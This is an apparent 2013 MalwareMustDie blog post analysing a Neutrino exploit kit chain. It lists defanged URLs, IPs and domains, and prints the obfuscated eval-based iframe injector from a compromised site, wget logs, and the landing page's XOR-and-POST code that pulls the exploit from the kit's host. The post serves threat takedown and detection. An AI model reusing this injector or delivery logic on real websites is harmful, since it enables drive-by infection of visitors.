Monday, June 24, 2013

Knockin' on Neutrino Exploit Kit's door.. (where is "that" PluginDetect 0.8.0 ??)

Summary of infection chains

This is going to be a long writing, but the weekdays has been started.. so does the daily work and they go first in #MalwareMustDie, NPO rules, so please allow me to split this post into two parts, this is the important part..

Found this EK in the progress of infection; URI reference, landing page & malicious obfuscation code used are showing Neutrino Exploit Kit traces, but there are slight changes compares previous findings posted by fellow researchers in here and there, so maybe it's a different or newest variant.

By the time I spotted this, it was a fresh on-growing threat and started to build infection chains. I can't just sit and watch nor just play with it, so as a quick act to stop this (which is a must) I dare myself to make malicious verdict post for the shutdown reference purpose. Please help to push this threat's shutdown ASAP, don't wait for the research's pace (with thank's in advance).

First, let's get straight to summary of infection as per below written table.
PS: Believe me that all of the information below is worth to block the threat, and NO! this is never be a good/legit mechanism, must be a malicious scheme, so don't waste your time in wondering, grab the sample we grabbed as per attached and see it yourself (quicker).

EK Functions IP Address URL
Redirector 74.53.108.147 h00p://www.webapps4hotels.com/?wps=2
TDS/Clicker 81.88.48.79 h00p://bizkaikopirenaika.com/clicker.php
Landing Page 178.17.169.199 h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
PluginDetect File 178.17.169.199 h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js
Payload/Infector URL 178.17.169.199 h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371

Neutrino EK is up in 178.17.169.199 in Moldova, Europe and serves random multiple domains infector as per below (we are requesting the shutting down for these malicious act at this moment), which is partially based on shared DNS service:

1. xxx.dnsdojo.com

mlviwwiokblfqj.dnsdojo.com
mocqrrrnqxeuyejthn.dnsdojo.com
hdpbdwndymbtrsvxship.dnsdojo.net
youbljtwmqfpggrest.dnsdojo.net
pxwkcdewyrqu.dnsdojo.net
kmevvwtioxwu.dnsdojo.net
  :
2. xxx.selfip.biz
ilustyewwwiec.selfip.biz
pporvwwsrqfwqdiiqvj.selfip.biz
ifwutmgywlrno.selfip.biz
hxlswcwsyodq.selfip.biz
mqydnjycdjmpdqhs.selfip.biz
wqkcrphwlxv.selfip.biz
fwklleuqdogcmhxtirw.selfip.biz
  :
3. xxx.worse-than.tv
45400f3233e52d15694cf990.worse-than.tv
26745522c585519482f0e3e3.worse-than.tv
d22a34203ed4dc4571e361de.worse-than.tv
  :
4. xxx.does-it.net
brmvcfvtplecyqryixyv.does-it.net
plmomkgpxxej.does-it.net
  :

While the TDS service used is in IP: 81.88.48.79 in Italy, which also a shared dynamic DNS domains/service as per below:

onlinux-es.setupdns.net 
Which is involving huge possibility of domains as malware infector, list is -->>[HERE]

Addionally the redirector used shared domains spotted in IP: 74.53.108.147 on Houston, Texas, of ISP/domain: theplanet.com

acaville.com.pe
fridgeadvisor.com
thetreadmilladvisor.com
webapps4hotels.com
  :

Neutrino EK's Landing / Infection Analysis

It was started from the redirection url via spam leads to the redirector URL.
By the browser it looks like this:

The download log..

--2013-06-24 19:00:11--  h00p://www.webapps4hotels.com/?wps=2
Resolving www.webapps4hotels.com... seconds 0.00, 74.53.108.147
Caching www.webapps4hotels.com => 74.53.108.147
Connecting to www.webapps4hotels.com|74.53.108.147|:80... seconds 0.00, connected.
  :"
GET /?wps=2 HTTP/1.0
Host: www.webapps4hotels.com
HTTP request sent, awaiting response...
 ":
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2013 10:00:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: h00p://www.webapps4hotels.com/xmlrpc.php
Set-Cookie: PHPSESSID=79a8dc9b2b759b5e987a266ce9991b74; path=/
Set-Cookie: nosqueeze=nosqueeze; expires=Mon, 17-Jun-2013 10:00:03 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
200 OK
  :
Length: unspecified [text/html]
Saving to: `index.html'
2013-06-24 19:00:13 (109 KB/s) - `index.html' saved [56700]
You'll see the malicious code right away as per snipped jinxed code:
<body class="home blog single-author two-column right-sidebar">

                                                               
    <script type="text/javascript" language="javascript" >
                                                                
                    bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;
ff=String.fromCharCode;z="dy";try{document["bo"+z]++}catch(d21vd12
v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval
"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,1
                  [...]
1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];
for(i=2-2;-i+1314!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]
))+0xa-bv);}za=e;za(s)}</script><div id="page" class="hfeed">
 <header id="branding" role="banner">
The code explains as per follows..

these variables are the key to rotate the values...

 sp="spli"+"t";
 w=window;
 ff=String.fromCharCode;
 z="dy";

..and then it writes the body...

 try
 {
   document["bo"+z]++
 }

..and after it runs , the eval burped...

   try
   {
     document;
   }
   catch(wb)
   {
     vzs=2;
   }
   if(!vzs)e=w["eval"];
      :

The burped eval value is the hidden IFRAMER with the specific cookie condition:

This is why I got the TDS URL, which I checked as follows:

// TDS trolls...

--2013-06-24 19:31:14--  "h00p://bizkaikopirenaika.com/clicker.php"
Resolving bizkaikopirenaika.com... seconds 0.00, 81.88.48.79
Caching bizkaikopirenaika.com => 81.88.48.79
Connecting to bizkaikopirenaika.com|81.88.48.79|:80... seconds 0.00, connected.
  :"
GET /clicker.php HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
Host: bizkaikopirenaika.com
HTTP request sent, awaiting response...
 ":"
HTTP/1.1 302 Found"
Date: Mon, 24 Jun 2013 10:31:07 GMT
Server: Apache/2.2.14 (Unix)
X-Powered-By: PHP/5.2.5
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Content-Length: 0
Content-Type: text/html
Content-Language: es
Keep-Alive: timeout=2, max=90
Connection: Keep-Alive
  :"
302 Found"
Location: h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371 [following]
Skipping 0 bytes of body: [] done.
--2013-06-24 19:31:18--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
Resolving youbljtwmqfpggrest.dnsdojo.net... seconds 0.00, 178.17.169.199
Caching youbljtwmqfpggrest.dnsdojo.net => 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... seconds 0.00, connected.
  :
GET /afscm?qomseteng=7559371 HTTP/1.0
Referer: h00p://www.webapps4hotels.com/?wps=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: youbljtwmqfpggrest.dnsdojo.net:8000
Connection: keep-alive
Keep-Alive: 300
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jun 2013 10:31:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.10-1ubuntu3.6
  :
200 OK
Length: unspecified [text/html]
Saving to: `afscm@qomseteng=7559371'
2013-06-24 19:31:22 (34.0 MB/s) - `afscm@qomseteng=7559371' saved [2512]
Well, we got the 302 that throwed us to the below url; "the" landing page.
h00p://youbljtwmqfpggrest.dnsdojo.net:8000/afscm?qomseteng=7559371
it will download us the below codes:

if we beautify the javascript part, which is the core of this infection and main verdict of the malicious act, you'll recognize it as the part of plugin detect codes to detect the plugin & etc components of your browsers, for the exploitation purpose:

For your reference, the full code of the landing page I beautified it here -->>[MMD PAstebin]
As you can see in the code, different from the previous Neutrino EK landing codes, it doesn't plainly mentioning the "host-id" or "password" used but now they hide it to be generated via below logic:
 JSON.stringify=JSON.stringify||function(a)
 {
   var c=typeof a;
   if("object"!=c||null===a)return"string"==c&&(a='"'+a+'"'),String(a);
   var d,b,e=[],f=a&&a.constructor==Array;
   for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")};

Back to the downloaded code (the Neutrino EK's landing page), it has so many links to .js and .css files, don't waste your time on these garbage, yes I checked them all, i.e. the .js files are below:

// below are the .js files..
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
...yup, to be sure I downloaded them all..
--2013-06-24 19:46:20--  h00p://youbljtwmqfpggrest.dnsdojo.net:8000/.js
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/javascript]
Saving to: `wgyesrof.js'
2013-06-24 19:46:23 (923 KB/s) - `wgyesrof.js' saved [118]
Saving to: `vuofg.js'
2013-06-24 19:46:51 (6.50 MB/s) - `vuofg.js' saved [181]
Saving to: `cqqv.js'
2013-06-24 19:47:06 (5.96 MB/s) - `cqqv.js' saved [178]
Saving to: `cnvpce.js'
2013-06-24 19:47:23 (866 KB/s) - `cnvpce.js' saved [29]
Saving to: `aqrwwpb.js'
2013-06-24 19:47:41 (677 KB/s) - `aqrwwpb.js' saved [24]
Saving to: `hptkkoyqvzt.js'
2013-06-24 19:47:58 (4.85 MB/s) - `hptkkoyqvzt.js' saved [182]
Saving to: `ppkuryqha.js'
2013-06-24 19:49:07 (1.83 MB/s) - `ppkuryqha.js' saved [107]
Saving to: `blgxhwyvdop.js'
2013-06-24 19:49:27 (360 KB/s) - `blgxhwyvdop.js' saved [10]
Saving to: `zenpzmilbxv.js'
2013-06-24 19:49:47 (4.85 MB/s) - `zenpzmilbxv.js' saved [135]
Saving to: `oumvvhkwsruznt.js'
2013-06-24 19:50:12 (154 KB/s) - `oumvvhkwsruznt.js' saved [21]
Saving to: `rhkggotwoffagc.js'
2013-06-24 19:50:32 (1.18 MB/s) - `rhkggotwoffagc.js' saved [37]
Contain crap of strings...
// the list.. 
"
2013/06/24  19:47    24 aqrwwpb.js        e56eb6406a2ad302e8960c79c27c638b
2013/06/24  19:49    10 blgxhwyvdop.js    3172a382e2d9f1af0ff4242a60b85bc8
2013/06/24  19:47    29 cnvpce.js         d98c8323b16f548cf96efe38c5a18038
2013/06/24  19:47   178 cqqv.js           4a6813af85e9e4a06539b30a598d7054
2013/06/24  19:47   182 hptkkoyqvzt.js    60f725e731ca6431db8a309e35da2f1b
2013/06/24  19:50    21 oumvvhkwsruznt.js d1429317cea14fa84a9583474b1b0b03
2013/06/24  19:49   107 ppkuryqha.js      b801f8e1dc5f7fb40acceea6c70fff2c
2013/06/24  19:50    37 rhkggotwoffagc.js 022488c0ad7f8f038173ba55130b03c7
2013/06/24  19:46   181 vuofg.js          dfab72d0ed8c9b4cf56b7dccf2cb3484
2013/06/24  19:46   118 wgyesrof.js       0b6057183dcedf3d275d3dc6ee4131fa
2013/06/24  19:49   135 zenpzmilbxv.js    8a29661c15b5940a4744576b291d1078
"
// assemble the codes...to find you the garbage...
"
wgyesrof.js
vuofg.js
cqqv.js
cnvpce.js
aqrwwpb.js
hptkkoyqvzt.js
ppkuryqha.js
blgxhwyvdop.js
zenpzmilbxv.js
oumvvhkwsruznt.js
rhkggotwoffagc.js
"
// cat & merge them all and result is here: 100% pure craps..

// wyczqnfpganiazbntkuycgxhytsxgyidwkcnyidfiqnjqpxkzsjcygjwacugacjxnmlmvordffmwukhucqxbxhyxjsejuohiasuvhmznsmjmwrhziea
// btkdpwixiezptqwfijjrukbbosnwrhosbywqveneintbdqhmzqeubfvpyjmprbiszeivjwarjutnkazjreetjzjhjvxawftwjcssyskindvxevhwzlpjlyqvtnwqspncrfvpygylkujoqqkpczzoypjsdgiwvvzmauczaakkutzkkjanja
// nzsdfulnbeahonomcixycuhxmwqtwxlkxendyzradsirfweifbhhwofilvchsnrqsftqekriczaiveqbfxicmolxjnecbwstbmkgwbozbohxsyyywhbivmffajhcgavhmgojicijrqhkofjknksixxnxhvznvvvibjrjmatdqaofgxq
// ggqkulbvalrssycymsyvfrkwjt
// xticyuzjlqnjbigpundax
// uapgllhhuyojyrzeaxhfbzwwtsgwwhoqhdxsoeajdosbgsggpomrniogbudxbrojumcjqdsurkwydcetrqlezzlaupywgngazjjqmckdmgcqjgjbxufxuryogxlnkrokayamalqmssdczmdxgjvabtpiqavbrjlshmehyvuroxunkxlqhgr
// voxtnlheexmejkkkjoffluwsvaaosrznfwhshpxmmjqvubgepljbggtbhuqzlpnrmukujihwsysmzzqplaqrgktoejoqzbilvsffamct
// hwouuqs
// igmeiwttqzebwsjihxodzsdoljcgbttjzgoichbthgueyemfcbjbunqgxsmylgilnwtpevjmberaiegkfqmzecgbvszgzhsmemcjilwkqnkyrrjwiwwmycntvnauuthzfkjo
// moqehjiffvtfkycywp
// oaqjntbakmsnnjuixihdcquslnvoidsxdi
it goes the same to the all .css files..
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/rcijxziqjmwai.css
ejuzjwuujkemwakngquwbriiviazztb
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/ubjabj.css
ylyvjo
$ peek h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/wqhbu.css
vhrmzrnkvxkvpnnjsrhegmuvxuipgv
   : 
$ peekl h00p://://youbljtwmqfpggrest.dnsdojo.net:8000/pqnojry.css
sxsstxnzjbjt

The PluginDetect 0.8.0

According plugin detection code above in the landing page, there MUST BE! the PluginDetect somewhere. Eager to know which version they use, I checked there is one more .JS worth to check, it is camouflaged under the /script/ directory. So let's fetch it:

--2013-06-24 20:02:06--  
"h00p://youbljtwmqfpggrest.dnsdojo.net:8000/scripts/js/plg.js"
Resolving youbljtwmqfpggrest.dnsdojo.net... 178.17.169.199
Connecting to youbljtwmqfpggrest.dnsdojo.net|178.17.169.199|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41616 (41K) [application/x-javascript]
Saving to: `plg.js'
2013-06-24 20:02:12 (42.4 KB/s) - `plg.js' saved [41616/41616]
Snipped is:
var PluginDetect={version:"0.8.0",name:"PluginDetect",openTag:...
RegExp(b):this.getNumRegx).exec(a):null;return c?c[0]:null},compar...
"0","0","0"]);for(c=0;4>c;c++)if(/^(0+)(.+)$/.test(d[c])&&(d[c]=Re...
this.$;return a.isIE&&7<=a.verIE?1:0},objectProperty:function(a){v...
!c.test(f))return d[e];return null},getMimeEnabledPlugin:function(...
if(!b||!b.getVersion)return c;c.plugin=b;this.isDefined(b.installe...
g&&f>g&&"0"!=d[f]||e[f]!=d[f]&&(-1==g&&(g=f),"0"!=d[f]))return b;r...
b,c=document,d=a.userAgent||"",e=a.vendor||"",f=a.platform||"",a=a....
c.getElementsByTagName("body")[0]||c.body||null;this.verIE=(this.i...
"")?5:b)||this.verIE;this.verIE=b||this.docModeIE}this.ActiveXEnab...
this.formatNum(RegExp.$1):null;this.verSafari=(this.isSafari=(/App...
this.isArray(a)&&0<a.length&&this.isFunc(a[0]))&&b.push(a)},callAr...
"0");1!=f.getVersionDone&&(f.getVersion(c,d,e),null===f.getVersion...
   :
The beautified code I pasted here--->>[MMD Pastebin]

Below is the list of detection & (malicious) weaponized possibility of this PluginDetect:

"Quicktime
Java
Flash
Shockwave
Windows Media Player
Silver Light
VideoLAN VLC
Adobe Reader
Real Player
"
Meaning, the exploitation of the above list of softwares are applicable.

The Neutrino EK's PluginDetect is not containing to a direct infection code, which all of the infection code is related to the applet in its landing pages so unlike the blackhole EK or cool EK, it will be no surprise to find Neutrino EK's PluginDetect script is undetectable by virus scanning products:

URL: https://www.virustotal.com/en/file/4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1/analysis/
SHA256: 4b4997b6353281a920e7082ec27bbe21d1803ef9d8239308c80ffd78326217a1
SHA1:  6c15ef7801f35733e89e8df0113866d8a09a5ba6
MD5:  13f62e2903683ec97a25885b05e8bed9
File size:      40.6 KB ( 41616 bytes )
File name:      plg.js
File type:      Text
Tags:           text
Detection ratio: 0 / 47
Analysis date:  2013-06-24 16:19:36 UTC ( 10 hours, 39 minutes ago ) 

Malicious Exploit Kit Verdict

The supporting verdict to PoC this the landing page as EK’s landing(Neutrino):

1. Attempt to xor and decode the URL:

$.post(d,f,function(a)
{$("body").append(xor(decodeURIComponent(a),c))
2. Neutrino EK's infector string building logic (to be used by post query later on):
 for(d in a)b=a[d],c=typeof b,"string"==c?b='"'+b+'"':"object"==c&&null!==b&&(b=JSON.stringify(b)),e.push((f?"":'"'+d+'":')+String(b));
 return(f?"[":"{")+String(e)+(f?"]":"}")
3. The XOR logic itself..
function xor(a,c)
 { for(var d="",b=0,e=0,b=0;b<a.length;b++)e=Math.floor(b%c.length),d+=String.fromCharCode(a.charCodeAt(b)^c.charCodeAt(e));
   return d }
4. Below is the Java exploit infection traces via POST request recorded (still on-checks, the target is keeping on changing too..):
Query:   POST /bxfkxhcqk HTTP/1.1
host:    h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000
Referer: h00p://pxthcftfbqcuxqtvlxljv.dnsdojo.net:8000/agofydqhtbubuy?qvtghxlw=7559371
This query above was generated by the below logic/code in the landing page:
[...]
   var f={};
   f[b]=c;
   f[e]=encodeURIComponent(xor(JSON.stringify(a),c));
   $.post(d,f,function(a) {$("body").append(xor(decodeURIComponent(a),c))}
    [...]
5. The camouflage attempt to download PluginDetect 0.8.0
6. The attempt to hide XOR key in var aa, bb, cc
$(document).ready(function()
{ var aa = 'gvwuhd';
  var bb = '';
  var cc = aa;
  bb = cc;
to be stored in the var bb in function's parameter below:
\u0410\u041d602(
  '51c81ff4aaa2cce42c1809bd',
   bb,
   'bxfkxhcqk',  // <-- this string "params d" goes to the post.. MMD note. 
   'rruqytkegrvjt',
   'eefazbuhfeekpb'   );
For the further to be used in XOR related calls/function in the "c" parameter:
function \u0410\u041d602(a,c,d,b,e)

To be continued..
(plan: to more break-down the PluginDetect codes, payload details, further infection spreading details..if the EK is still exist later on..)


Additional

A couple of URLQuery result of this part of story---> [1] and [2]
And Virus Total infection check result (pDNS) for the Exploit Kit's IP is here-->>[Virus Total]

Samples and PCAP data is shared for raising the detection ratio and research purpose only:

Download here--->>[MMD Dumps]

Reference

Our friend "Malware Forensic" (link) wrote good analysis on previous version of Neutrino:
(click the number inside the bracket for links)
[-1-] Neutrino Exploit Kit landing page demystified
[-2-] Neutrino Exploit Kit Landing pane change or variation
[-3-] Neutrino Exploit Kit analysis

The great Exploit Kit researcher @kafeine (link) posted Neutrino EK:
[-1-] Hello Neutrino ! (just one more Exploit Kit)
[-2-] CVE-2013-2423 integrating Exploit Kits (Neutrino EK Parts)
[-3-] His tweet on changes spotted in this Exploit Kit:

Update Information

1. Since the shutdown was faster than grabbing overall EK data, I am sorry, no Part 2 for this post.
2. Our friend found new landing page, we decoded here-->>[MMD Pastebin]

#MalwareMustDie!